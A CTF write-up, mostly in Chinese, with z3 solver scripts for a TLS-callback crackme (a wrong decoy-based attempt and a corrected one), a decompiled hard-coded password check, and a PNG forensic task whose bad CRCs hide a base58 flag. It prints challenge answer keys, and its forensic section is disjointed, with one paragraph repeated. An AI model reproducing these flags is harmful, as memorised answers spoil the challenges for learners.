__int8)v8[rand() % 2 + 34]; MessageBoxA(0, Text, Caption, 0);
提交不正确的程序(只按 main 里那套约束解的版本):
# TLS challenge, first (wrong) attempt: solves only the constraints of the
# decompiled main(). That routine turned out to be a decoy: the real checks
# live in a TLS callback (see the corrected script further down), and main
# cannot even produce the required caption, because BYTE2(v11) is the
# constant 79 ('O') where "T3N4CI0US" needs '0' (0x30). Kept for reference.
Caption = b'T3N4CI0US'
Text = b'CoNGRAtS!'
from z3 import *
# One 8-bit symbolic byte per input byte (main checks ftell() == 19).
Buffer = [BitVec(f'Buffer_{i}',8) for i in range(19)]
v8 = [0]*36
# v8[*] transcribed from the decompiler output; 8-bit BitVec arithmetic
# wraps like the original unsigned char math.
v8[0] = (Buffer[11] * Buffer[11] - Buffer[11]) ^ (Buffer[0] + Buffer[18] * Buffer[12] * Buffer[17] + Buffer[5] + Buffer[0] * Buffer[16] - Buffer[14] * Buffer[1]) ^ 0x59;
v8[1] = (Buffer[1] + Buffer[7] * Buffer[0] - Buffer[18] * Buffer[0] - Buffer[5]) ^ (Buffer[12] + Buffer[4] * Buffer[2]) ^ (Buffer[1] - Buffer[10] * Buffer[3]) ^ 0x7B;
v8[2] = Buffer[11] ^ Buffer[8] ^ (Buffer[1] * Buffer[15] + Buffer[3] * Buffer[17] - Buffer[14] - Buffer[5] - Buffer[1] - Buffer[6]) ^ Buffer[3] ^ 0xC0;
v8[3] = Buffer[9] ^ Buffer[5] ^ (Buffer[8] + Buffer[3] + Buffer[4] + Buffer[18] - Buffer[4] * Buffer[6]) ^ Buffer[15] ^ 0xAD;
v8[4] = Buffer[12] ^ (Buffer[18] * Buffer[18] * Buffer[4] - Buffer[7] - Buffer[3]) ^ (Buffer[3] - Buffer[17] - Buffer[1]) ^ (Buffer[5] + Buffer[7] * Buffer[18]) ^ 0x55;
v8[5] = (Buffer[10] + Buffer[3] * Buffer[14] - Buffer[15]) ^ (Buffer[8] + Buffer[14] - Buffer[11]) ^ Buffer[3] ^ 0x9C;
v8[6] = Buffer[6] ^ Buffer[3] ^ Buffer[9] ^ (Buffer[2] * Buffer[5] * Buffer[17] + Buffer[11] + Buffer[17] - Buffer[15] - Buffer[5] - Buffer[7]) ^ 0x12;
v8[7] = (Buffer[8] * Buffer[9] * Buffer[17]) ^ (Buffer[5] * Buffer[2] * Buffer[16] - Buffer[5] - Buffer[7]) ^ Buffer[16] ^ 0x34;
v8[8] = Buffer[4] ^ Buffer[7] ^ Buffer[6] ^ (Buffer[16] * Buffer[4] - Buffer[7] * Buffer[15]) ^ (Buffer[1] * Buffer[10] * Buffer[1] * Buffer[17]) ^ Buffer[10] ^ 0x53;
v8[9] = (Buffer[12] * Buffer[3]) ^ (Buffer[5] * Buffer[9] + Buffer[13] + Buffer[2] + Buffer[15] * Buffer[9] - Buffer[1] - Buffer[14] * Buffer[3]) ^ 0x50;
v8[10] = (Buffer[5] * Buffer[7]) ^ Buffer[11] ^ (Buffer[12] - Buffer[15]) ^ (Buffer[0] + Buffer[9]) ^ (Buffer[7] - Buffer[1] * Buffer[3]) ^ 0x13;
v8[11] = (Buffer[10] + Buffer[2] * Buffer[17]) ^ (Buffer[16] + Buffer[15] * Buffer[6] + Buffer[11] + Buffer[9] - Buffer[4]) ^ Buffer[5] ^ 0x62;
v8[12] = (Buffer[6] + Buffer[7] - Buffer[5] - Buffer[9] - Buffer[5] * Buffer[12]) ^ Buffer[16] ^ (Buffer[8] * Buffer[14]) ^ 0x9B;
v8[13] = Buffer[0] ^ (Buffer[16] + Buffer[9] + Buffer[5] * Buffer[17] - Buffer[0]) ^ (Buffer[18] + Buffer[6] + Buffer[16]) ^ 0x85;
v8[14] = Buffer[3] ^ (Buffer[11] + Buffer[6]) ^ (Buffer[2] * Buffer[14] * Buffer[0]) ^ Buffer[7] ^ (Buffer[15] - Buffer[2]) ^ 0x73;
v8[15] = (Buffer[2] * Buffer[18] + Buffer[10]) ^ (Buffer[5] + Buffer[14] * Buffer[16] - Buffer[8] - Buffer[6] - Buffer[17]) ^ (Buffer[0] * Buffer[7] + Buffer[9]) ^ 0x3D;
v8[16] = (Buffer[14] + Buffer[7] - Buffer[8] - Buffer[6] - Buffer[8]) ^ Buffer[2] ^ Buffer[16] ^ 0xD0;
v8[17] = (Buffer[0] * Buffer[17] * Buffer[3] * Buffer[2]) ^ (Buffer[13] - Buffer[8] - Buffer[10] * Buffer[5]) ^ (Buffer[12] + Buffer[0]) ^ (Buffer[11] + Buffer[10]) ^ 0xF2;
v8[18] = (Buffer[5] * Buffer[15] * Buffer[8] + Buffer[7] * Buffer[8] + Buffer[15] - Buffer[1] - Buffer[12]) ^ 0x92;
v8[19] = (Buffer[6] * Buffer[0]) ^ (Buffer[12] * Buffer[14] + Buffer[11] + Buffer[1] - Buffer[9] * Buffer[16] - Buffer[18] - Buffer[9]) ^ 0x43;
v8[20] = (Buffer[0] + Buffer[11]) ^ (Buffer[17] + Buffer[8] * Buffer[3] - Buffer[7]) ^ (Buffer[7] + Buffer[7] * Buffer[16] + Buffer[0] - Buffer[10]) ^ 0x18;
v8[21] = Buffer[9] ^ (Buffer[9] + Buffer[8] * Buffer[9] - Buffer[17]) ^ (Buffer[2] * Buffer[4] * Buffer[1] * Buffer[15] * Buffer[17] * Buffer[5]) ^ 0x26;
v8[22] = Buffer[8] ^ (Buffer[5] * Buffer[15] - Buffer[11] * Buffer[17] * Buffer[2]) ^ Buffer[18] ^ 0x9B;
v8[23] = (Buffer[1] * Buffer[17] * Buffer[4]) ^ (Buffer[5] + Buffer[11] * Buffer[11]) ^ (Buffer[2] - Buffer[7]) ^ (Buffer[14] * Buffer[9]) ^ Buffer[11] ^ 0x38;
v8[24] = (Buffer[4] * Buffer[11] * Buffer[12] - Buffer[1]) ^ (Buffer[14] * Buffer[5]) ^ Buffer[14] ^ Buffer[12] ^ 0x7F;
v8[25] = Buffer[10] ^ (Buffer[10] - Buffer[16]) ^ (Buffer[9] * Buffer[15]) ^ 0x40;
v8[26] = (Buffer[12] * Buffer[8]) ^ (Buffer[13] * Buffer[13]) ^ (Buffer[2] * Buffer[1] - Buffer[11]) ^ (Buffer[3] + Buffer[10]) ^ 0x12;
v8[27] = (Buffer[6] * Buffer[14]) ^ Buffer[17] ^ (Buffer[18] * Buffer[2] + Buffer[4]) ^ 0x7E;
v8[28] = (Buffer[10] + Buffer[16]) ^ (Buffer[8] * Buffer[11] + Buffer[15]) ^ Buffer[13] ^ (Buffer[4] * Buffer[15] - Buffer[8]) ^ 0x7F;
v8[29] = (Buffer[1] + Buffer[10]) ^ (Buffer[6] + Buffer[6] + Buffer[4] + Buffer[0] + Buffer[12] + Buffer[7] * Buffer[5] - Buffer[2]) ^ 0xDF;
v8[30] = (Buffer[9] * Buffer[0] * Buffer[5] * Buffer[1] - Buffer[1]) ^ Buffer[14] ^ (Buffer[9] + Buffer[6] - Buffer[4]) ^ 0xF4;
v8[31] = (Buffer[5] * Buffer[0] * Buffer[4] + Buffer[7]) ^ (Buffer[5] * Buffer[6] * Buffer[7]) ^ Buffer[11] ^ Buffer[9] ^ 0x53;
v8[32] = (Buffer[12] - Buffer[9]) ^ (Buffer[10] - Buffer[1]) ^ Buffer[2] ^ 0x50;
v8[33] = (Buffer[8] - Buffer[10]) ^ (Buffer[7] + Buffer[3] - Buffer[0]) ^ (Buffer[13] * Buffer[0] * Buffer[18] - Buffer[15]) ^ 0xE3;
v8[34] = (Buffer[3] + Buffer[1] - Buffer[15] - Buffer[2] - Buffer[0]) ^ (Buffer[5] - Buffer[4]) ^ Buffer[10] ^ 0xCF;
v8[35] = (Buffer[10] * Buffer[8] * Buffer[6] * Buffer[11] * Buffer[11] * Buffer[1]) ^ (Buffer[13] * Buffer[18] + Buffer[5]) ^ 0x98;
s = Solver()
for i in range(19):
    # Printable only. z3's '>=' on BitVec is signed, so this also rules out
    # bytes >= 0x80, which is fine for an ASCII answer.
    s.add(Buffer[i]>=0x20)
'''
Text[0] = v8[rand() % 2];
Text[2] = v8[rand() % 2 + 4];
Text[3] = v8[rand() % 2 + 6];
LOBYTE(v15) = v8[rand() % 2 + 16];
BYTE1(v14) = v8[11 - rand() % 2];
HIBYTE(v14) = v8[rand() % 2 + 14];
LOBYTE(v14) = v8[rand() % 2 + 8];
BYTE2(v14) = v8[13 - rand() % 2];
Text[1] = v8[3 - rand() % 2];
HIBYTE(v15) = 0;
'''
#
# r: one guessed rand() % 2 outcome per selection (only r[0..16] are used;
# where the digits came from is not recorded -- presumably a debugger run).
# This is the flaw: the seed is time(0), so no single guess is valid and
# every candidate v8 must match, not just one.
r = '10111100110101100000101100011110001110101111010010'
# Text[4..7] are the bytes of v14 (LOBYTE=4, BYTE1=5, BYTE2=6, HIBYTE=7),
# Text[8] is LOBYTE(v15).
s.add(v8[0 + int(r[0])] == Text[0])
s.add(v8[4 + int(r[1])] == Text[2])
s.add(v8[6 + int(r[2])] == Text[3])
s.add(v8[16 + int(r[3])] == Text[8])
s.add(v8[11 - int(r[4])] == Text[5])
s.add(v8[14 + int(r[5])] == Text[7])
s.add(v8[8 + int(r[6])] == Text[4])
s.add(v8[12 + int(r[7])] == Text[6])
s.add(v8[2 + int(r[8])] == Text[1])
'''
Caption[0] = v8[rand() % 2 + 18];
Caption[1] = v8[rand() % 2 + 20];
Caption[2] = v8[rand() % 2 + 22];
Caption[3] = v8[rand() % 2 + 24];
LOBYTE(v11) = v8[rand() % 2 + 26];
BYTE1(v11) = v8[rand() % 2 + 28];
BYTE2(v11) = 79;
HIBYTE(v11) = v8[rand() % 2 + 32];
v12 = (unsigned __int8)v8[rand() % 2 + 34];
'''
# Caption[4..7] are the bytes of v11, Caption[8] is v12. Caption[6] is not
# constrained because the binary hard-codes it to 79 ('O') -- which can never
# equal the '0' the challenge asks for.
s.add(v8[18 + int(r[9])] == Caption[0])
s.add(v8[20 + int(r[10])] == Caption[1])
s.add(v8[22 + int(r[11])] == Caption[2])
s.add(v8[24 + int(r[12])] == Caption[3])
s.add(v8[26 + int(r[13])] == Caption[4])
s.add(v8[28 + int(r[14])] == Caption[5])
s.add(v8[32 + int(r[15])] == Caption[7])
s.add(v8[34 + int(r[16])] == Caption[8])
s.check()  # result ignored: s.model() raises if the system is unsat
d = s.model()
for i in range(19):
    print(chr(d[Buffer[i]].as_long()), end='')
#i7's_zer0_n0t_B19_O
#T3N4CI0US{i7's_zer0_n0t_B19_O}
题目提示
Make the MessageBox print 'CoNGRAtS!' in text and 'T3N4CI0US' in caption! Example: MessageBox.jpg (with file data, no program patches are allowed) flag format is T3N4CI0US{FileData}
正确的程序。看了 WP,终于发现不对的地方:一是题名叫 TLS——程序里有 TLS 回调,它在 main 之前由加载器执行,所以从 main 的调用关系上看它"并没有运行到",但真正生成 Text/Caption 的约束应该就在 TLS 回调里;main 里那套是假的,一个明显的信号是 main 里 BYTE2(v11) 被写死为 79(字母 'O'),而要求的 caption T3N4CI0US 第 7 个字符是数字 '0',main 根本弹不出正确的 caption。二是 srand(time(0)) 用当前时间做种子,rand()%3 选哪个候选是不可预测的,所以每个输出字符对应的三个候选 v8 必须全部等于目标字符,不用关心哪个成立,三个约束都要加上——只约束其中一个的话解空间太大,会得到很多错误的解。稍加改动后终于出正确结果。
# TLS challenge, corrected solver: the constraints below are the ones from
# the TLS callback (29 input bytes, 54 candidates, rand() % 3 picks), not
# from main(). Because the seed is time(0), all three candidates for each
# output byte are constrained to the target character, so the solution is
# valid whatever rand() returns.
Caption = b'T3N4CI0US'
Text = b'CoNGRAtS!'
from z3 import *
# One 8-bit symbolic byte per input byte.
Buffer = [BitVec(f'Buffer_{i}',8) for i in range(29)]
v8 = [0]*54
# v8[*] transcribed from the decompiler output; 8-bit BitVec arithmetic
# wraps like the original unsigned char math.
v8[0] = Buffer[8] ^ (Buffer[12] + Buffer[18] + Buffer[11] + Buffer[12] - Buffer[3] * Buffer[20] - Buffer[24]) ^ 0x37
v8[1] = Buffer[3] ^ (Buffer[17] - Buffer[26]) ^ (Buffer[6] * Buffer[14]) ^ (Buffer[15] + Buffer[13] - Buffer[14]- Buffer[6] - Buffer[20]) ^ 0xC3
v8[2] = (Buffer[5] + Buffer[23] + Buffer[16]) ^ (Buffer[10] * Buffer[8] * Buffer[25] * Buffer[1] * Buffer[18] + Buffer[18]) ^ 0x10
v8[3] = (Buffer[18] * Buffer[13] - Buffer[9]) ^ (Buffer[12] * Buffer[10] + Buffer[14] * Buffer[25] * Buffer[16] - Buffer[12]) ^ Buffer[20] ^ 0x36
v8[4] = (Buffer[24] * Buffer[1] * Buffer[15] - Buffer[3] * Buffer[4]) ^ (Buffer[0] - Buffer[14]) ^ (Buffer[27] + Buffer[7] * Buffer[12]) ^ 0x7D
v8[5] = (Buffer[9] * Buffer[28] * Buffer[7]) ^ Buffer[11] ^ (Buffer[24] * Buffer[5]) ^ (Buffer[13] + Buffer[9]) ^ (Buffer[14] * Buffer[25] - Buffer[24]) ^ 0x4E
v8[6] = (Buffer[20] - Buffer[8] * Buffer[23] - Buffer[4] * Buffer[26] * Buffer[25]) ^ (Buffer[11] + Buffer[8]) ^ 0x8F
v8[7] = Buffer[3] ^ (Buffer[0] + Buffer[11] + Buffer[8] - Buffer[24] - Buffer[7] - Buffer[23] * Buffer[2] - Buffer[1] - Buffer[1]) ^ (Buffer[23] * Buffer[8]) ^ 0xF7
v8[8] = (Buffer[3] - Buffer[9] - Buffer[2]) ^ (Buffer[27] - Buffer[26] - Buffer[16] * Buffer[4]) ^ 0x78
v8[9] = Buffer[11] ^ (Buffer[7] * Buffer[3]) ^ Buffer[23] ^ (Buffer[5] + Buffer[18] + Buffer[21] * Buffer[28] + Buffer[2]) ^ 0xDF
v8[10] = (Buffer[11] + Buffer[15] * Buffer[8] + Buffer[5] * Buffer[18] * Buffer[27]) ^ (Buffer[7] + Buffer[21] + Buffer[11] + Buffer[15] - Buffer[26]) ^ 0x11
v8[11] = (Buffer[8] * Buffer[19]) ^ (Buffer[19] - Buffer[13] * Buffer[0] * Buffer[3] - Buffer[15] - Buffer[28]) ^ 0x4D
v8[12] = (Buffer[25] * Buffer[3] - Buffer[8] * Buffer[5]) ^ (Buffer[2] * Buffer[11] * Buffer[2] * Buffer[25] + Buffer[24] - Buffer[13] - Buffer[12]) ^ 0x44
v8[13] = (Buffer[19] - Buffer[0] * Buffer[12]) ^ (Buffer[5] + Buffer[15] * Buffer[18] + Buffer[5] + Buffer[28] - Buffer[4] * Buffer[25]) ^ 0xB1
v8[14] = (Buffer[3] + Buffer[17]) ^ (Buffer[7] - Buffer[6]) ^ (Buffer[4] * Buffer[0]) ^ (Buffer[18] + Buffer[10] + Buffer[28] * Buffer[6]- Buffer[14] - Buffer[28]) ^ 0x30
v8[15] = (Buffer[0] - Buffer[0] * Buffer[20]) ^ Buffer[19] ^ (Buffer[0] + Buffer[22] * Buffer[10]) ^ 0x41
v8[16] = (Buffer[0] * Buffer[25] - Buffer[9]) ^ (Buffer[7] + Buffer[4] - Buffer[25] - Buffer[1] - Buffer[12]) ^ 0x39
v8[17] = (Buffer[12] + Buffer[19] + Buffer[16]) ^ (Buffer[12] + Buffer[19]) ^ Buffer[23] ^ (Buffer[8] - Buffer[9]) ^ Buffer[21] ^ (Buffer[20] * Buffer[1]) ^ 0xF5
v8[18] = (Buffer[6] - Buffer[5]) ^ (Buffer[15] + Buffer[3] + Buffer[19] * Buffer[5] - Buffer[21]) ^ (Buffer[27] * Buffer[1] * Buffer[25]) ^ 0x22
v8[19] = (Buffer[5] * Buffer[18] * Buffer[16] * Buffer[5]) ^ Buffer[28] ^ (Buffer[6] + Buffer[1] + Buffer[0]- Buffer[19]) ^ (Buffer[28] - Buffer[18] - Buffer[13]) ^ 0xEC
v8[20] = (Buffer[2] + Buffer[10]) ^ (Buffer[19] + Buffer[13] - Buffer[9] * Buffer[4]) ^ Buffer[2] ^ 0x5D
v8[21] = (Buffer[11] * Buffer[12] + Buffer[1] * Buffer[19] + Buffer[17] - Buffer[5]) ^ (Buffer[1] + Buffer[18]) ^ 0xA2
v8[22] = (Buffer[24] - Buffer[28] - Buffer[6] * Buffer[21] * Buffer[12]) ^ (Buffer[8] * Buffer[6] - Buffer[16]) ^ 0xE9
v8[23] = (Buffer[11] + Buffer[11] + Buffer[19] * Buffer[7] - Buffer[20] * Buffer[26]) ^ (Buffer[20] * Buffer[1]) ^ 0xB1
v8[24] = (Buffer[12] + Buffer[18] * Buffer[17] + Buffer[24]) ^ (Buffer[16] * Buffer[16] - Buffer[11]) ^ (Buffer[4] + Buffer[23]) ^ 0x38
v8[25] = (Buffer[9] * Buffer[27]) ^ (Buffer[12] - Buffer[5] - Buffer[26] - Buffer[2] * Buffer[19]) ^ Buffer[14] ^ 0x43
v8[26] = (Buffer[6] + Buffer[17] - Buffer[23]) ^ (Buffer[6] + Buffer[2] - Buffer[7] * Buffer[5]) ^ Buffer[6] ^ 0x94
v8[27] = (Buffer[14] + Buffer[5] - Buffer[0] - Buffer[13] - Buffer[18] - Buffer[4]) ^ (Buffer[0] + Buffer[18] - Buffer[24]) ^ 0x63
v8[28] = (Buffer[13] * Buffer[21] * Buffer[9] + Buffer[8] + Buffer[22] + Buffer[13] * Buffer[6] - Buffer[14] - Buffer[16]- Buffer[7]) ^ 0xCD
v8[29] = (Buffer[28] - Buffer[16] * Buffer[13] - Buffer[6]) ^ Buffer[8] ^ (Buffer[28] - Buffer[15] - Buffer[7]) ^ (Buffer[22] - Buffer[19]) ^ 0xD9
v8[30] = Buffer[1] ^ (Buffer[16] + Buffer[9] + Buffer[18] + Buffer[5] + Buffer[9] - Buffer[2] - Buffer[8]) ^ (Buffer[0] * Buffer[6]) ^ 0xF6
v8[31] = Buffer[2] ^ (Buffer[14] + Buffer[5] * Buffer[26] * Buffer[16]) ^ (Buffer[25] * Buffer[11] - Buffer[4]) ^ (Buffer[2] - Buffer[15]) ^ 0x78
v8[32] = (Buffer[5] * Buffer[28] * Buffer[17] + Buffer[7] * Buffer[8]) ^ (Buffer[12] + Buffer[23] + Buffer[18] - Buffer[12] * Buffer[20]) ^ Buffer[22] ^ 0x61
v8[33] = (Buffer[2] * Buffer[25] - Buffer[8] * Buffer[2] - Buffer[4] * Buffer[21] * Buffer[1]) ^ 0x18
v8[34] = (Buffer[5] * Buffer[24] + Buffer[24]) ^ (Buffer[10] * Buffer[2] * Buffer[20]) ^ Buffer[18] ^ Buffer[9] ^ 0xE4
v8[35] = Buffer[11] ^ (Buffer[5] - Buffer[5] * Buffer[4] * Buffer[5] * Buffer[12] * Buffer[24]) ^ 0xAE
v8[36] = (Buffer[6] + Buffer[12] + Buffer[1] * Buffer[19] - Buffer[23]) ^ Buffer[3] ^ (Buffer[26] - Buffer[16]) ^ 0x6E
v8[37] = (Buffer[17] * Buffer[21] + Buffer[26] - Buffer[7] * Buffer[16]) ^ (Buffer[15] - Buffer[26]) ^ 0xC8
v8[38] = (Buffer[11] * Buffer[14]) ^ (Buffer[17] + Buffer[5] + Buffer[17] * Buffer[28] - Buffer[0]) ^ Buffer[3] ^ (Buffer[17] * Buffer[28]) ^ 0xDD
v8[39] = (Buffer[9] + Buffer[28] * Buffer[12] + Buffer[25] - Buffer[2]) ^ (Buffer[2] + Buffer[4]) ^ 0xDA
v8[40] = Buffer[12] ^ (Buffer[13] + Buffer[18]) ^ (Buffer[15] - Buffer[14]) ^ Buffer[23] ^ (Buffer[28] + Buffer[9]) ^ 0x92
v8[41] = (Buffer[27] - Buffer[6]) ^ Buffer[1] ^ (Buffer[24] + Buffer[7]) ^ (Buffer[27] - Buffer[17] - Buffer[7]) ^ 0xEB
v8[42] = (Buffer[12] + Buffer[10] + Buffer[28] - Buffer[4] - Buffer[22] - Buffer[7] - Buffer[2] * Buffer[16] * Buffer[15] - Buffer[1]) ^ (Buffer[1] - Buffer[2]) ^ 0x34
v8[43] = Buffer[5] ^ (Buffer[16] + Buffer[16] + Buffer[23] - Buffer[11]) ^ (Buffer[5] * Buffer[6]) ^ 0x23
v8[44] = (Buffer[3] * Buffer[16] + Buffer[17] + Buffer[14] * Buffer[24] * Buffer[21] * Buffer[13]) ^ 0xEE
v8[45] = (Buffer[7] + Buffer[26]) ^ (Buffer[26] - Buffer[2] - Buffer[23]) ^ (Buffer[14] * Buffer[4]) ^ (Buffer[21] - Buffer[12]) ^ 0xD5
v8[46] = Buffer[10] ^ (Buffer[22] + Buffer[8] * Buffer[8] - Buffer[27] * Buffer[3]) ^ (Buffer[0] * Buffer[9] * Buffer[8] - Buffer[24] * Buffer[2]) ^ 0xF0
v8[47] = Buffer[3] ^ (Buffer[9] + Buffer[15] - Buffer[25] - Buffer[12]) ^ Buffer[23] ^ (Buffer[23] + Buffer[6] - Buffer[8]) ^ 0x72
v8[48] = Buffer[11] ^ (Buffer[1] * Buffer[23] + Buffer[6] * Buffer[24] * Buffer[9] * Buffer[13] + Buffer[13]) ^ 0x54
v8[49] = Buffer[2] ^ -(Buffer[19] * Buffer[7]) ^ (Buffer[2] - Buffer[24]) ^ Buffer[20] ^ 0x89
v8[50] = (Buffer[7] * Buffer[26]) ^ (Buffer[3] * Buffer[21]) ^ Buffer[11] ^ (Buffer[1] + Buffer[28]) ^ -Buffer[12] ^ 0xF0
v8[51] = Buffer[0] ^ (Buffer[19] - Buffer[18] - Buffer[3] * Buffer[7]) ^ (Buffer[4] * Buffer[27] + Buffer[7]) ^ Buffer[23] ^ 1
v8[52] = (Buffer[0] * Buffer[21] + Buffer[20] + Buffer[18]) ^ (Buffer[10] + Buffer[13]) ^ Buffer[17] ^ Buffer[0] ^ 0xC9
v8[53] = (Buffer[7] + Buffer[22]) ^ (Buffer[6] + Buffer[18] + Buffer[28] - Buffer[1]) ^ (Buffer[16] * Buffer[15] + Buffer[3] - Buffer[23] * Buffer[5]) ^ 0x74
# No printable-range constraint this time; the system turned out to be
# tight enough without it.
s = Solver()
'''
Text[0] = v8[rand() % 3]
Text[2] = v8[rand() % 3 + 6]
Text[3] = v8[rand() % 3 + 9]
LOBYTE(v15) = v8[rand() % 3 + 24]
BYTE1(v14) = v8[17 - rand() % 3]
HIBYTE(v14) = v8[rand() % 3 + 21]
LOBYTE(v14) = v8[rand() % 3 + 12]
BYTE2(v14) = v8[20 - rand() % 3]
Text[1] = v8[5 - rand() % 3]
HIBYTE(v15) = 0
'''
# Text[4..7] are the bytes of v14 (LOBYTE=4, BYTE1=5, BYTE2=6, HIBYTE=7) and
# Text[8] is LOBYTE(v15). Each s.add() takes a list, i.e. all three
# candidates of a pick must equal the target byte.
s.add([v8[0 + 0] == Text[0] , v8[0 + 1] == Text[0] , v8[0 + 2] == Text[0]])
s.add([v8[6 + 0] == Text[2] , v8[6 + 1] == Text[2] , v8[6 + 2] == Text[2]])
s.add([v8[9 + 0] == Text[3] , v8[9 + 1] == Text[3] , v8[9 + 2] == Text[3]])
s.add([v8[24+ 0] == Text[8] , v8[24+ 1] == Text[8] , v8[24+ 2] == Text[8]])
s.add([v8[17- 0] == Text[5] , v8[17- 1] == Text[5] , v8[17- 2] == Text[5]])
s.add([v8[21+ 0] == Text[7] , v8[21+ 1] == Text[7] , v8[21+ 2] == Text[7]])
s.add([v8[12+ 0] == Text[4] , v8[12+ 1] == Text[4] , v8[12+ 2] == Text[4]])
s.add([v8[20- 0] == Text[6] , v8[20- 1] == Text[6] , v8[20- 2] == Text[6]])
s.add([v8[5 - 0] == Text[1] , v8[5 - 1] == Text[1] , v8[5 - 2] == Text[1]])
'''
Caption[0] = v8[rand() % 3 + 27]
Caption[1] = v8[rand() % 3 + 30]
Caption[2] = v8[rand() % 3 + 33]
Caption[3] = v8[rand() % 3 + 36]
LOBYTE(v11) = v8[rand() % 3 + 39]
BYTE1(v11) = v8[rand() % 3 + 42]
BYTE2(v11) = v8[rand() % 3 + 45]
HIBYTE(v11) = v8[rand() % 3 + 48]
v12 = (unsigned __int8)v8[rand() % 3 + 51]
'''
# Caption[4..7] are the bytes of v11, Caption[8] is v12. Unlike main(), this
# routine computes Caption[6] (the '0') instead of hard-coding 'O'.
s.add([v8[27 + 0] == Caption[0] , v8[27 + 1] == Caption[0] , v8[27 + 2] == Caption[0]])
s.add([v8[30 + 0] == Caption[1] , v8[30 + 1] == Caption[1] , v8[30 + 2] == Caption[1]])
s.add([v8[33 + 0] == Caption[2] , v8[33 + 1] == Caption[2] , v8[33 + 2] == Caption[2]])
s.add([v8[36 + 0] == Caption[3] , v8[36 + 1] == Caption[3] , v8[36 + 2] == Caption[3]])
s.add([v8[39 + 0] == Caption[4] , v8[39 + 1] == Caption[4] , v8[39 + 2] == Caption[4]])
s.add([v8[42 + 0] == Caption[5] , v8[42 + 1] == Caption[5] , v8[42 + 2] == Caption[5]])
s.add([v8[45 + 0] == Caption[6] , v8[45 + 1] == Caption[6] , v8[45 + 2] == Caption[6]])
s.add([v8[48 + 0] == Caption[7] , v8[48 + 1] == Caption[7] , v8[48 + 2] == Caption[7]])
s.add([v8[51 + 0] == Caption[8] , v8[51 + 1] == Caption[8] , v8[51 + 2] == Caption[8]])
s.check()  # result ignored: s.model() raises if the system is unsat
d = s.model()
# Prints all 29 solved bytes; the 28 shown below presumably omit a trailing
# byte (e.g. the newline fgets keeps) -- confirm against the actual output.
for i in range(len(Buffer)):
    print(chr(d[Buffer[i]].as_long()), end='')
#Fak3RouTine_Do_turn_FAk3F!aG
- 我感觉这是唯一有点难度的题:32 位,UPX 壳,脱壳后 z3 一把梭,但提交不正确,不知道哪错了(原因见上面)。
Swood
// Swood: decompiled main. No hashing happens at all: argv[1] is compared
// directly (strncmp, 0x28 = 40 chars) against a hard-coded literal, so the
// "password" is that literal itself. The literal is the SHA-1 digest of
// the empty string, presumably the intended hint. Because strncmp only
// checks the first 40 bytes, any longer argument with that prefix also
// passes. The typo in "Correect" is the binary's own string.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s1[48]; // [rsp+10h] [rbp-30h] BYREF

  if ( argc > 1 )
  {
    strcpy(s1, "da39a3ee5e6b4b0d3255bfef95601890afd80709");
    if ( !strncmp(s1, argv[1], 0x28uLL) )
    {
      puts("Correect password!");
      return 0;
    }
    else
    {
      puts("Wrong password!");
      return 1;
    }
  }
  else
  {
    printf("Usage: %s <string>\n", *argv);
    return 1;
  }
}
直接 strncmp 比较硬编码字符串就不说啥了,居然正确。顺便一提,da39a3ee5e6b4b0d3255bfef95601890afd80709 是空字符串的 SHA-1,比较长度 0x28=40 正好是 SHA-1 hex 的长度,所以参数前 40 个字符是这个串就能过。
Forensic
yhparg
docx
password
- 给出一个 PNG 图片,用 010 Editor 打开发现 chunk[2]~chunk[11] 这 10 个 chunk 的 CRC 都不对,而且错的 CRC 值正好都是可显示 ASCII 字符,按 chunk 顺序拼起来就是一段 40 字符的 base58 文本。
*ERROR: CRC Mismatch @ chunk[2]; in data: 34706869; expected: 608c6056 *ERROR: CRC Mismatch @ chunk[3]; in data: 4b624a4d; expected: fd917212 *ERROR: CRC Mismatch @ chunk[4]; in data: 4d326176; expected: 1887ceca *ERROR: CRC Mismatch @ chunk[5]; in data: 52676b31; expected: d3be40b9 *ERROR: CRC Mismatch @ chunk[6]; in data: 59763645; expected: 2828dec9 *ERROR: CRC Mismatch @ chunk[7]; in data: 71594d70; expected: f3bac867 *ERROR: CRC Mismatch @ chunk[8]; in data: 3143636e; expected: 368fbf8b *ERROR: CRC Mismatch @ chunk[9]; in data: 4e696265; expected: 07df8db0 *ERROR: CRC Mismatch @ chunk[10]; in data: 56756345; expected: 54c5867d *ERROR: CRC Mismatch @ chunk[11]; in data: 59696d7a; expected: 9078d2bd
把这些 CRC 按顺序拼成 hex 转回字节,再做 base58 解码:
>>> bytes.fromhex('347068694b624a4d4d32617652676b315976364571594d703143636e4e6962655675634559696d7a') b'4phiKbJMM2avRgk1Yv6EqYMp1CcnNibeVucEYimz' #T3N4CI0US{Is_escape_V4ry_Fun}
- 给出一个 PNG 图片,用 010 Editor 打开发现 chunk[2]~chunk[11] 这 10 个 chunk 的 CRC 都不对,而且错的 CRC 值正好都是可显示 ASCII 字符,按 chunk 顺序拼起来就是一段 40 字符的 base58 文本。
key
- 附件需要从谷歌网盘下。